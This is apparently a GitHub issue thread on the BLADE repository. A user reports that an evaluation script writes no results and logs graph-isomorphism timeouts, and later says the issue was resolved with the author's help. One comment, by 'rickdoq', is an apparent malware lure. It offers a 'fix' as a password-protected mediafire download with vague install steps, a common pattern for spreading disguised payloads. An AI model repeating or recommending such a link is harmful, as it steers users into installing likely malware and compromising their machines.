### ISSUE TITLE
How to run evaluation?

### ISSUE THREAD

**Issue by shaoyijia** [behavioral-data/BLADE#1]
Thank you for this great work!

I am trying to run your code and I obtain [workdir2.zip](https://github.com/user-attachments/files/16823726/workdir2.zip) after running `python run_gen_analyses.py --run_dataset soccer -n 1 --use_agent --llm_config_path config.yml  --llm_eval_config_path eval_config.yml --output_dir workdir2`.

Then I try to run `python run_get_eval.py --multirun_load_path workdir2/multirun_analyses.json --llm_eval_config_path eval_config.yml --output_dir workdir2_eval` to evaluate the obtained analysis. However, I there are only `command.sh` and `run_eval.log` written in the `--output_dir` and I cannot find the evaluation result. Based on the log, I think it's because I keep getting this error:
```
[utils.py:71 - blade_bench.utils:wrapper][DEBUG] Timeout for is_isomorphic, args=(<networkx.classes.digraph.DiGraph object at 0x7feca23c1960>, <networkx.classes.digraph.DiGraph object at 0x7fec803e4dc0>)
```

Also, I notice the evaluation process is very slow. It takes more than 5 minutes to finish running `run_get_eval.py` even though I haven't got the evaluation result at the end.

Currently, I haven't changed any part of your code so don't really what goes wrong. I'd appreciate it if you could help on this!

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by shaoyijia** [comment]
The issue is resolved with the author's help. Thanks!
